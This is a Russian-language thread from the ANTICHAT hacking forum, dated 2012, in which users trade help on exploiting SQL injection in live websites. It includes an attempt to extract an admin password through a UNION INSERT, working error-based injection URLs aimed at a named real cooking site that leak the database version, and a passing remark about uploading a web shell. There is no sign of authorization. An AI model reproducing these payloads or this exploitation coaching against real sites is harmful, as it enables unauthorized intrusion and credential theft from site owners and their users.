ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
22.03.2012, 11:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от Pirotexnik
Pirotexnik said:
хм, действительно. Спасибо.
Но в большинстве случае шелл заливается с того же юзера, что и апач.
единственное, что не во всех случаях разрешено этому пользователю создавать исполняемые пхп скрипты.
|
|
|
|
22.03.2012, 21:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
379
Репутация:
0
|
|
нашел активную sql инъекцию однако не получается составить запрос
INSERT INTO results_temp (session_id, quest_id, ans_id, start_time)
SELECT 28273, tq.quest_id, ta.id, '1970-01-01 03:00:00'
FROM tmp_answers_28273 as ta, tmp_quest_28273 as tq
WHERE tq.virtual_id=2 AND ta.virtual_id=12
UNION INSERT INTO results_temp (start_time) SELECT passwd FROM users WHERE login='admin'
на первую часть запроса могу влиять очень мало, поэтому требуется использование UNION
в ответе возвращается ERROR: DB Error: syntax error
можете что-нить посоветовать?
юнион требует работы с одинаковым колчеством ячеек даже в случае инсерт??
|
|
|
|
22.03.2012, 22:08
|
|
Guest
Сообщений: n/a
Провел на форуме:
22665
Репутация:
-6
|
|
Сообщение от iProtoss
iProtoss said:
нашел активную sql инъекцию однако не получается составить запрос
INSERT INTO results_temp (session_id, quest_id, ans_id, start_time)
SELECT 28273, tq.quest_id, ta.id, '1970-01-01 03:00:00'
FROM tmp_answers_28273 as ta, tmp_quest_28273 as tq
WHERE tq.virtual_id=2 AND ta.virtual_id=12
UNION INSERT INTO results_temp (start_time) SELECT passwd FROM users WHERE login='admin'
на первую часть запроса могу влиять очень мало, поэтому требуется использование UNION
в ответе возвращается ERROR: DB Error: syntax error
можете что-нить посоветовать?
юнион требует работы с одинаковым колчеством ячеек даже в случае инсерт??
что-то вообще ничего понять не могу
в mysql нельзя писать union insert, если ты об этом
|
|
|
|
22.03.2012, 22:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
323
Репутация:
0
|
|
Сообщение от iProtoss
iProtoss said:
нашел активную sql инъекцию однако не получается составить запрос
INSERT INTO results_temp (session_id, quest_id, ans_id, start_time)
SELECT 28273, tq.quest_id, ta.id, '1970-01-01 03:00:00'
FROM tmp_answers_28273 as ta, tmp_quest_28273 as tq
WHERE tq.virtual_id=2 AND ta.virtual_id=12
UNION INSERT INTO results_temp (start_time) SELECT passwd FROM users WHERE login='admin'
на первую часть запроса могу влиять очень мало, поэтому требуется использование UNION
в ответе возвращается ERROR: DB Error: syntax error
можете что-нить посоветовать?
юнион требует работы с одинаковым колчеством ячеек даже в случае инсерт??
Попробуй это
http://devteev.blogspot.com/2010/02/sql-injection-insert-update-delete-etc.html
А вообще, лучше бы ты линк скинул.
|
|
|
|
23.03.2012, 13:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от Melfis
Melfis said:
http://sibkulinar.ru/placecooking.php
?id=2' and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
народ. что ети функции делают я понимаю, непойму почему они заставляют вывоится инфу, кто может обьяснить?
|
|
|
|
23.03.2012, 13:04
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906
Репутация:
-14
|
|
Сообщение от qaz
qaz said:
народ. что ети функции делают я понимаю, непойму почему они заставляют вывоится инфу, кто может обьяснить?
FLOOR(RAND(0)*2) - Эта функция заставляет скрипт выводить ошибку.
|
|
|
23.03.2012, 13:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от aydin-ka
aydin-ka said:
FLOOR(RAND(0)*2) - Эта функция заставляет скрипт выводить ошибку.
не, ну ето я уже знаю
но вот например так не выводит
http://sibkulinar.ru/placecooking.php?id=2%27+or+1+group+by+concat%28%2 8select+version%28%29%29,0x00,floor%28rand%280%29* 2%29%29having+min%280%29+or+1--+
а так выводит
http://sibkulinar.ru/placecooking.php
?id=2' and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
почему?
|
|
|
|
23.03.2012, 13:10
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401
Репутация:
0
|
|
Сообщение от qaz
qaz said:
не, ну ето я уже знаю
но вот например так не выводит
http://sibkulinar.ru/placecooking.php?id=2%27+or+1+group+by+concat%28%2 8select+version%28%29%29,0x00,floor%28rand%280%29* 2%29%29having+min%280%29+or+1--+
а так выводит
http://sibkulinar.ru/placecooking.php
?id=2' and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
почему?
потому что это блайнд. и в данном случае результат запроса возвращается в ошибке. т.е. для эксплутации нам нужно вызвать ошибку и вывести через неё данные. вот и вся суть error based'a.
|
|
|
|
23.03.2012, 13:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от d1v
d1v said:
потому что это блайнд. и в данном случае результат запроса возвращается в ошибке. т.е. для эксплутации нам нужно вызвать ошибку и вывести через неё данные. вот и вся суть error based'a.
хм... неочень понятно,
допустим тут разве результат запроса не возвращается в ошибке? ведь тут тоже вызваем ошибку и выводим через неё данные
+or+1+group+by+concat((select+version()),0x00,floo r(rand(0)*2))having+min(0)+or+1--+
или нет?
|
|
|
|
23.03.2012, 13:30
|
|
Новичок
Регистрация: 06.04.2009
Сообщений: 2
Провел на форуме:
150479
Репутация:
2
|
|
Сообщение от qaz
qaz said:
хм... неочень понятно,
допустим тут разве результат запроса не возвращается в ошибке? ведь тут тоже вызваем ошибку и выводим через неё данные
+or+1+group+by+concat((select+version()),0x00,floo r(rand(0)*2))having+min(0)+or+1--+
или нет?
http://www.xakep.ru/post/52222/ - почитай эту статейку, думаю все станет ясно.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
